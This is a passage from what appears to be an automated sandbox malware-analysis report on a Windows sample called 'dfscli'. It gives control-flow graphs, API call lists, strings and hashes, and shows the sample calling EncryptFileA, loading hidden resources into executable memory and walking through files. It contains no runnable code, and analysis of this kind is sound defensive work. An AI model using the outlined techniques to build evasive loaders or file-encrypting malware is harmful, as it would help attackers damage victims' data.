36804->36803 36805 223993c 36804->36805 36806 2233e80 GetPEB 36804->36806 36807 22342f0 36804->36807 36818 2237ab0 GetPEB 36804->36818 36806->36804 36808 22342fd 36807->36808 36811 2234313 36807->36811 36822 2233f20 GetPEB 36808->36822 36810 2234307 36823 2233e80 GetPEB 36810->36823 36813 2234340 RtlAllocateHeap 36811->36813 36824 2233f20 GetPEB 36811->36824 36813->36804 36815 223432f 36825 2233e80 GetPEB 36815->36825 36817 223433b 36817->36813 36818->36804 36819->36799 36820->36796 36821->36805 36822->36810 36823->36811 36824->36815 36825->36817 36826 42829c 36827 4282aa 36826->36827 36830 4281d2 36827->36830 36828 4282d7 36831 42828e RegCloseKey 36830->36831 36836 428206 36830->36836 36831->36828 36832 428207 RegOpenKeyExA 36833 428276 RegCloseKey 36832->36833 36832->36836 36833->36832 36834 42828d 36833->36834 36834->36831 36835 428224 RegQueryValueExA 36835->36836 36836->36832 36836->36833 36836->36835

                                                                  Executed Functions

                                                                  Function 00402530 Relevance: 44.3, APIs: 9, Strings: 16, Instructions: 563libraryloaderfileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 402530-402575 LoadLibraryA GetProcAddress EncryptFileA 1 402f31-402f48 0->1 2 40257b-40268b call 401d60 * 3 call 402490 * 2 0->2 13 40269a-40276e call 401d60 * 3 call 402490 * 2 2->13 14 40268d-402697 call 41f153 2->14 27 402770-40277a call 41f153 13->27 28 40277d-402848 call 401d60 * 3 call 402490 * 2 13->28 14->13 27->28 41 402857-402913 call 401d60 * 2 call 402490 LoadLibraryA GetProcAddress 28->41 42 40284a-402854 call 41f153 28->42 51 402915 41->51 52 40291c-402948 GetProcAddress LdrFindResource_U 41->52 42->41 51->52 53 402967-4029bc VirtualAlloc call 401190 call 401e50 52->53 54 40294a-402961 LdrAccessResource 52->54 58 4029c1-4029ce call 42c68a 53->58 54->53 62 4029d4-4029ec call 4270cc 58->62 63 402c5f-402cbc call 404ad1 call 403b40 call 403100 call 4015d0 58->63 69 4029fe-402a1a 62->69 70 4029ee-4029fb call 41f153 62->70 96 402cce-402cea 63->96 97 402cbe-402ccb call 41f153 63->97 73 402a2c-402a48 69->73 74 402a1c-402a29 call 41f153 69->74 70->69 78 402a5a-402a76 73->78 79 402a4a-402a57 call 41f153 73->79 74->73 81 402a88-402aa4 78->81 82 402a78-402a85 call 41f153 78->82 79->78 87 402ab3-402acc 81->87 88 402aa6-402ab0 call 41f153 81->88 82->81 93 402ade-402af7 87->93 94 402ace-402adb call 41f153 87->94 88->87 99 402b06-402b19 93->99 100 402af9-402b03 call 41f153 93->100 94->93 105 402cfc-402d18 96->105 106 402cec-402cf9 call 41f153 96->106 97->96 102 402b2b-402b47 99->102 103 402b1b-402b28 call 41f153 99->103 100->99 112 402b59-402b75 102->112 113 402b49-402b56 call 41f153 102->113 103->102 109 402d2a-402d46 105->109 110 402d1a-402d27 call 41f153 105->110 106->105 117 402d58-402d74 109->117 118 402d48-402d55 call 41f153 109->118 110->109 121 402b87-402ba0 112->121 122 402b77-402b84 call 41f153 112->122 113->112 126 402d83-402d9c 117->126 127 402d76-402d80 call 41f153 117->127 118->117 130 402ba2-402bac call 41f153 121->130 131 402baf-402bc2 121->131 122->121 137 402dae-402dc7 126->137 138 402d9e-402dab call 41f153 126->138 127->126 130->131 133 402bd4-402bf0 131->133 134 402bc4-402bd1 call 41f153 131->134 144 402c02-402c1e 133->144 145 402bf2-402bff call 41f153 133->145 134->133 141 402dd6-402de9 137->141 142 402dc9-402dd3 call 41f153 137->142 138->137 149 402dfb-402e17 141->149 150 402deb-402df8 call 41f153 141->150 142->141 153 402c30-402c4c 144->153 154 402c20-402c2d call 41f153 144->154 145->144 158 402e29-402e45 149->158 159 402e19-402e26 call 41f153 149->159 150->149 162 402c52-402c5a 153->162 163 402f2e-402f30 153->163 154->153 167 402e57-402e70 158->167 168 402e47-402e54 call 41f153 158->168 159->158 164 402f26-402f2b call 41f153 162->164 163->1 164->163 170 402e72-402e7c call 41f153 167->170 171 402e7f-402e92 167->171 168->167 170->171 177 402ea4-402ec0 171->177 178 402e94-402ea1 call 41f153 171->178 182 402ed2-402eee 177->182 183 402ec2-402ecf call 41f153 177->183 178->177 186 402f00-402f1c 182->186 187 402ef0-402efd call 41f153 182->187 183->182 186->163 188 402f1e-402f25 186->188 187->186 188->164
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(Advapi32.dll,EncryptFileA), ref: 00402563
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00402566
                                                                  • EncryptFileA.ADVAPI32(C:\Windows\Setup\State\State.ini), ref: 00402571
                                                                  • LoadLibraryA.KERNEL32 ref: 004028F0
                                                                  • GetProcAddress.KERNEL32(00000000,LdrFindResource_U), ref: 004028FA
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040291E
                                                                  • LdrFindResource_U.NTDLL(00400000,?,00000003,?), ref: 00402940
                                                                  • LdrAccessResource.NTDLL(00400000,?,?,?), ref: 00402961
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00402974
                                                                    • Part of subcall function 00403B40: LoadIconA.USER32(?,00000080), ref: 00403C94
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLoadProc$Library$AccessAllocEncryptFileFindIconResourceResource_Virtual
                                                                  • String ID: 2sqN7HPu$ul(RB@jWoBnNar^zWR24F02n#bnM3gX6zQ>^jmGICwkhJ?*#2^h2EEKd&#?A8<JT0c%Q?f1Y6Da*fKp6B+(L3!F<O*&V$Acces$Advapi32.dll$C:\Windows\Setup\State\State.ini$EncryptFileA$Ldr$LdrAccessR$LdrFin$LdrFindResource_U$dReso$esource$ntdll.dll$r_n$sResource$tdll$urce_U
                                                                  • API String ID: 2745701538-3822946923
                                                                  • Opcode ID: ff7380a43e44da0602bb0ab87dd5fe5d31548b4def8bd87a78dd0ffcd0c5d888
                                                                  • Instruction ID: 7606226607a74ee82f4d59785f456a1b28ac7059c3ee9b1f73d73fed3cc09996
                                                                  • Opcode Fuzzy Hash: ff7380a43e44da0602bb0ab87dd5fe5d31548b4def8bd87a78dd0ffcd0c5d888
                                                                  • Instruction Fuzzy Hash: 074208B19083C0DBD331DF1AC585BCBFBE4AB99704F44492FA1C953291DAB8A548CB5B
                                                                  Function 021C1030 Relevance: 18.4, APIs: 12, Instructions: 362libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 192 21c1030-21c1075 LoadLibraryW GetProcAddress call 21c1b30 195 21c107e-21c108f 192->195 196 21c1077-21c1079 192->196 198 21c1091-21c109e SetLastError 195->198 199 21c10a3-21c10be call 21c1b30 195->199 197 21c148d-21c1490 196->197 198->197 202 21c10c7-21c10dc 199->202 203 21c10c0-21c10c2 199->203 204 21c10de-21c10eb SetLastError 202->204 205 21c10f0-21c10fd 202->205 203->197 204->197 206 21c10ff-21c110c SetLastError 205->206 207 21c1111-21c111a 205->207 206->197 208 21c111c-21c1129 SetLastError 207->208 209 21c112e-21c114f 207->209 208->197 210 21c1163-21c116d 209->210 211 21c116f-21c1176 210->211 212 21c11a5-21c11d5 GetNativeSystemInfo call 21c18d0 * 2 210->212 214 21c1178-21c1184 211->214 215 21c1186-21c1192 211->215 223 21c11e9-21c120c call 21c1800 212->223 224 21c11d7-21c11e4 SetLastError 212->224 217 21c1195-21c119b 214->217 215->217 219 21c119d-21c11a0 217->219 220 21c11a3 217->220 219->220 220->210 226 21c123d-21c1255 GetProcessHeap RtlAllocateHeap 223->226 227 21c120e-21c121f call 21c1800 223->227 224->197 228 21c127b-21c1291 226->228 229 21c1257-21c1276 SetLastError 226->229 232 21c1222-21c122c 227->232 230 21c129c 228->230 231 21c1293-21c129a 228->231 229->197 234 21c12a3-21c1300 call 21c1b30 230->234 231->234 232->226 235 21c122e-21c1238 SetLastError 232->235 238 21c1307-21c1370 call 21c1800 call 21c1980 call 21c1b50 234->238 239 21c1302 234->239 235->197 248 21c1377-21c1388 238->248 249 21c1372 238->249 240 21c147f-21c148b call 21c16c0 239->240 240->197 250 21c138a-21c13a0 call 21c2090 248->250 251 21c13a2-21c13a5 248->251 249->240 253 21c13ac-21c13ba call 21c21a0 250->253 251->253 257 21c13bc 253->257 258 21c13c1-21c13c5 call 21c1e80 253->258 257->240 260 21c13ca-21c13cf 258->260 261 21c13d6-21c13e4 call 21c2010 260->261 262 21c13d1 260->262 265 21c13eb-21c13f4 261->265 266 21c13e6 261->266 262->240 267 21c13f6-21c13fd 265->267 268 21c1470-21c1473 265->268 266->240 269 21c145d-21c146b 267->269 270 21c13ff-21c145b GetPEB 267->270 271 21c147a-21c147d 268->271 272 21c146e 269->272 270->272 271->197 272->271
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(021C4054,021C4040), ref: 021C1047
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 021C104E
                                                                    • Part of subcall function 021C1B30: SetLastError.KERNEL32(0000000D,?,021C1070,?,00000040), ref: 021C1B3D
                                                                  • SetLastError.KERNEL32(000000C1), ref: 021C1096
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117474523.00000000021C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021C1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_21c1000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$AddressLibraryLoadProc
                                                                  • String ID:
                                                                  • API String ID: 1866314245-0
                                                                  • Opcode ID: 4e1785371ebb9f57421cbce8350b40e1edd31fb862d47bdf074662a375863cbc
                                                                  • Instruction ID: b59886c71aed4a2e72cd0ea571c40822bc6f3e393d8593127308e9e854b68d1d
                                                                  • Opcode Fuzzy Hash: 4e1785371ebb9f57421cbce8350b40e1edd31fb862d47bdf074662a375863cbc
                                                                  • Instruction Fuzzy Hash: BAF1FEB9E80209EFDB04CF94D584BAEB7B1BF58314F208598E919A7342D735EA51CF90
                                                                  Function 022338F0 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 189fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 368 22338f0-223390b 369 2233910-2233915 368->369 370 2233a74-2233a79 369->370 371 223391b 369->371 372 2233b62-2233b67 370->372 373 2233a7f-2233a84 370->373 374 2233921-2233926 371->374 375 2233a2c-2233a33 371->375 372->369 376 223393a-223393f 373->376 377 2233a8a-2233a8f 373->377 378 2233988-223399b call 22334c0 374->378 379 2233928-223392d 374->379 380 2233a50-2233a64 FindFirstFileW 375->380 381 2233a35-2233a4b call 2233f20 call 2233e80 375->381 376->369 389 2233941-223394b 376->389 385 2233a95-2233a9b 377->385 386 2233b3c-2233b5d 377->386 401 22339b8-22339d3 378->401 402 223399d-22339b3 call 2233f20 call 2233e80 378->402 387 223392f-2233934 379->387 388 223394c-2233953 379->388 383 2233b93-2233b9d 380->383 384 2233a6a-2233a6f 380->384 381->380 384->369 392 2233abf-2233ac1 385->392 393 2233a9d-2233aa5 385->393 386->369 387->376 394 2233b6c-2233b73 387->394 395 2233970-2233986 FindNextFileW 388->395 396 2233955-223396b call 2233f20 call 2233e80 388->396 404 2233ab5-2233aba 392->404 406 2233ac3-2233ad6 call 22334c0 392->406 403 2233aa7-2233aab 393->403 393->404 399 2233b90-2233b91 FindClose 394->399 400 2233b75-2233b8b call 2233f20 call 2233e80 394->400 395->369 396->395 399->383 400->399 423 22339f0-22339fb 401->423 424 22339d5-22339eb call 2233f20 call 2233e80 401->424 402->401 403->392 411 2233aad-2233ab3 403->411 404->369 419 2233af3-2233b23 call 22338f0 406->419 420 2233ad8-2233aee call 2233f20 call 2233e80 406->420 411->392 411->404 442 2233b28-2233b37 call 2233460 419->442 420->419 435 2233a18-2233a27 423->435 436 22339fd-2233a13 call 2233f20 call 2233e80 423->436 424->423 435->369 436->435 442->369
                                                                  APIs
                                                                  • FindNextFileW.KERNELBASE(?,?,00000000,0223998D,16BF64F2,00000001), ref: 02233976
                                                                  • FindFirstFileW.KERNELBASE(?,?,00000000,0223998D,16BF64F2,00000001), ref: 02233A5D
                                                                  • FindClose.KERNELBASE(?,00000000,0223998D,16BF64F2,00000001), ref: 02233B91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID: .$8T]$8T]$Ei$Ei
                                                                  • API String ID: 3541575487-3972632629
                                                                  • Opcode ID: e49163eba9a52b0195cf0fe269b95a06e541571b8fa58a3d11c86563151b10d6
                                                                  • Instruction ID: e2110a1afe3a452984fedbae5295bfbe0882b947111b9b60d376f3440b7b6ca3
                                                                  • Opcode Fuzzy Hash: e49163eba9a52b0195cf0fe269b95a06e541571b8fa58a3d11c86563151b10d6
                                                                  • Instruction Fuzzy Hash: B851C4F5B3430197C726EAF4A84467B36E6AB80354F04099DE946C7248EF79CA1587D2
                                                                  Function 02238240 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 183fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 604 2238240-223832a 605 2238332-2238338 604->605 606 2238431-2238437 605->606 607 223833e 605->607 608 22384c3-22384c8 606->608 609 223843d-2238443 606->609 610 2238344-223834a 607->610 611 22383fc-2238403 607->611 608->605 612 2238445-223844c 609->612 613 22384ac-22384b2 609->613 614 22383c0-22383c7 610->614 615 223834c-2238352 610->615 616 2238420-223842c 611->616 617 2238405-223841b call 2233f20 call 2233e80 611->617 620 2238469-223848c 612->620 621 223844e-2238464 call 2233f20 call 2233e80 612->621 613->605 622 22384b8-22384c2 613->622 618 22383e4-22383f7 614->618 619 22383c9-22383df call 2233f20 call 2233e80 614->619 623 2238358-223835e 615->623 624 22384cd-2238515 call 223b590 615->624 616->605 617->616 618->605 619->618 640 22384a9 620->640 641 223848e-22384a4 call 2233f20 call 2233e80 620->641 621->620 623->613 630 2238364-223836c 623->630 624->622 647 2238517 624->647 637 223836e-2238386 call 2233f20 call 2233e80 630->637 638 223838c-22383b0 CreateFileW 630->638 637->638 638->622 643 22383b6-22383bb 638->643 640->613 641->640 643->605 652 2238519-223851b 647->652 653 223851d-223852a 647->653 652->622 652->653
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000,?,?,00000000,2564BE4F), ref: 022383A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID: J$.#v
                                                                  • API String ID: 823142352-3621003161
                                                                  • Opcode ID: dc04e8415f8b403b2db57900e774afde47804ba0af262eab940fd3d3e61ed8c2
                                                                  • Instruction ID: 046fc3dc4dde37c9fd8800998cf9e95323985028582ccfc22bde7e6b40b044dc
                                                                  • Opcode Fuzzy Hash: dc04e8415f8b403b2db57900e774afde47804ba0af262eab940fd3d3e61ed8c2
                                                                  • Instruction Fuzzy Hash: CE61ADB2A283019BC709DFA8D484A2FB7E6ABC4754F04891DF495DB298D774C9098BD3
                                                                  Function 02237EC0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 227fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 277 2237ec0-2237f8c 278 2237f94-2237f99 277->278 279 2237fa0-2237fa6 278->279 280 22380cb-22380d1 279->280 281 2237fac 279->281 284 22380d7-22380dd 280->284 285 22381a8-22381b0 280->285 282 223801a-223802e call 22334c0 281->282 283 2237fae-2237fb4 281->283 312 2238030-2238048 call 2233f20 call 2233e80 282->312 313 223804e-2238076 282->313 286 2237fb6-2237fbc 283->286 287 2237fd5-2238018 call 223b590 283->287 288 2238173-223817a 284->288 289 22380e3-22380e9 284->289 291 22381b2-22381ca call 2233f20 call 2233e80 285->291 292 22381d0-22381f4 CreateFileW 285->292 297 2237fc2-2237fc8 286->297 298 2238200-2238207 286->298 287->279 295 2238197-22381a3 288->295 296 223817c-2238192 call 2233f20 call 2233e80 288->296 300 22380eb-2238122 289->300 301 223815a-2238160 289->301 291->292 293 2238227-2238233 292->293 294 22381f6-22381fb 292->294 294->279 295->279 296->295 297->301 308 2237fce-2237fd3 297->308 306 2238224-2238225 FindCloseChangeNotification 298->306 307 2238209-223821f call 2233f20 call 2233e80 298->307 310 2238124-223813a call 2233f20 call 2233e80 300->310 311 223813f-2238155 SetFileInformationByHandle 300->311 301->279 304 2238166-2238172 301->304 306->293 307->306 308->279 310->311 311->279 312->313 328 2238093-223809e 313->328 329 2238078-223808e call 2233f20 call 2233e80 313->329 340 22380a0-22380b6 call 2233f20 call 2233e80 328->340 341 22380bb-22380c6 328->341 329->328 340->341 341->278
                                                                  APIs
                                                                  • SetFileInformationByHandle.KERNELBASE(007EF903,00000000,?,00000028), ref: 02238149
                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000), ref: 022381ED
                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02238225
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$ChangeCloseCreateFindHandleInformationNotification
                                                                  • String ID: J$e?M:$e?M:$.#v$Ei${
                                                                  • API String ID: 1885865419-1658071454
                                                                  • Opcode ID: dc67a909832748e3640bac90cbd2579213ab096e5f993dec6094df8410dae01b
                                                                  • Instruction ID: d57d0373b525ab6045a60ed935b2befa2aef531a9fc61ea6449958a1c718d36e
                                                                  • Opcode Fuzzy Hash: dc67a909832748e3640bac90cbd2579213ab096e5f993dec6094df8410dae01b
                                                                  • Instruction Fuzzy Hash: E381C2B1A183019FC719DFA4A49462BB6E6BBC4748F000D2DF556CB258EB74D9048FD3
                                                                  Function 004297AA Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 348 4297aa-4297c9 EnterCriticalSection 349 4297cb-4297d2 348->349 350 4297d8-4297dd 348->350 349->350 351 42988c-42988f 349->351 352 4297fa-429802 350->352 353 4297df-4297e2 350->353 354 429891-429894 351->354 355 429897-4298b5 LeaveCriticalSection 351->355 357 429814-429833 GlobalHandle GlobalUnlock GlobalReAlloc 352->357 358 429804-429812 GlobalAlloc 352->358 356 4297e5-4297e8 353->356 354->355 359 4297f2-4297f4 356->359 360 4297ea-4297f0 356->360 361 429839-42983b 357->361 358->361 359->351 359->352 360->356 360->359 362 429860-429889 GlobalLock call 40ee80 361->362 363 42983d-429842 361->363 362->351 365 429852-429855 LeaveCriticalSection 363->365 366 429844-42984c GlobalHandle GlobalLock 363->366 365->362 366->365
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0043F1BC,76230A60,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8), ref: 004297BB
                                                                  • GlobalAlloc.KERNELBASE(00000002,00000040,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8), ref: 0042980C
                                                                  • GlobalHandle.KERNEL32(006125A0), ref: 00429815
                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 0042981F
                                                                  • GlobalReAlloc.KERNEL32(?,00000040,00002002), ref: 00429833
                                                                  • GlobalHandle.KERNEL32(006125A0), ref: 00429845
                                                                  • GlobalLock.KERNEL32(00000000,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 0042984C
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 00429855
                                                                  • GlobalLock.KERNEL32(00000000,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 00429861
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 004298A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                  • String ID:
                                                                  • API String ID: 2667261700-0
                                                                  • Opcode ID: 4f9e3a5ef5ad01d73bbac885e9157687d52a2eef6912d29c00d5968687f22220
                                                                  • Instruction ID: c16d36367e021ba24902c865a556433996ae8c1a0eb80cc3bd54c7b43d994e5f
                                                                  • Opcode Fuzzy Hash: 4f9e3a5ef5ad01d73bbac885e9157687d52a2eef6912d29c00d5968687f22220
                                                                  • Instruction Fuzzy Hash: 43319A30700714AFDB20DF66D888A6ABBF9FB84344B44497EE546D3620D734ED06CB68
                                                                  Function 0042A134 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105stringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 449 42a134-42a17d call 4295d4 GetModuleFileNameA 452 42a183 call 425d8a 449->452 453 42a17f-42a181 449->453 454 42a188-42a19a PathFindExtensionA 452->454 453->452 453->454 456 42a1a1-42a1bd call 42a105 454->456 457 42a19c call 425d8a 454->457 461 42a1c4-42a1c9 456->461 462 42a1bf call 425d8a 456->462 457->456 464 42a1db-42a1de 461->464 465 42a1cb-42a1d8 call 40f132 461->465 462->461 467 42a1e0-42a1ee call 42453c 464->467 468 42a209-42a212 464->468 465->464 477 42a1f3-42a1f5 467->477 469 42a214-42a218 468->469 470 42a245-42a248 468->470 473 42a221 469->473 474 42a21a-42a21f 469->474 475 42a24a-42a269 lstrcatA call 40f132 470->475 476 42a26c-42a281 call 40ea18 470->476 478 42a226-42a242 lstrcpyA call 40f132 473->478 474->478 475->476 480 42a1f7-42a1fb 477->480 481 42a1fd 477->481 478->470 485 42a200-42a206 call 40f132 480->485 481->485 485->468
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 0042A175
                                                                  • PathFindExtensionA.KERNELBASE(?), ref: 0042A18F
                                                                  • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0042A229
                                                                  • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0042A256
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ExtensionFileFindModuleNamePathlstrcatlstrcpy
                                                                  • String ID: .CHM$.HLP$.INI
                                                                  • API String ID: 2140653559-4017452060
                                                                  • Opcode ID: 1f62230ddda9a0eead22fd259ae79f4ed6fab4bf6a31e99d3694113894dfedf5
                                                                  • Instruction ID: bd75d3f52a36107bd73cc6bad142ef63f8b4208a48895ac81a5cbf6014c068f0
                                                                  • Opcode Fuzzy Hash: 1f62230ddda9a0eead22fd259ae79f4ed6fab4bf6a31e99d3694113894dfedf5
                                                                  • Instruction Fuzzy Hash: 19418C71600758DFCB30EFAAEC44ADA77E8EB08314F50482BE986D6241DB389955CF29
                                                                  Function 0042A282 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 38libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 490 42a282-42a2ae SetErrorMode * 2 call 4295d4 * 2 495 42a2b0-42a2c3 call 42a134 490->495 496 42a2c8-42a2d2 call 4295d4 490->496 495->496 500 42a2d4 call 41f835 496->500 501 42a2d9-42a2e6 496->501 500->501 504 42a2e8-42a2f4 GetProcAddress 501->504 505 42a2f9-42a2fc 501->505 504->505
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00000000,00000000,00425BE7,?,?,?,?,76230A60,00000000,?,0040E996,00000000), ref: 0042A28B
                                                                  • SetErrorMode.KERNELBASE(00000000,?,0040E996,00000000), ref: 0042A293
                                                                  • GetModuleHandleA.KERNEL32(user32.dll,0040E996,00000000), ref: 0042A2DE
                                                                  • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 0042A2EE
                                                                    • Part of subcall function 0042A134: GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 0042A175
                                                                    • Part of subcall function 0042A134: PathFindExtensionA.KERNELBASE(?), ref: 0042A18F
                                                                    • Part of subcall function 0042A134: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0042A229
                                                                    • Part of subcall function 0042A134: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0042A256
                                                                  Strings
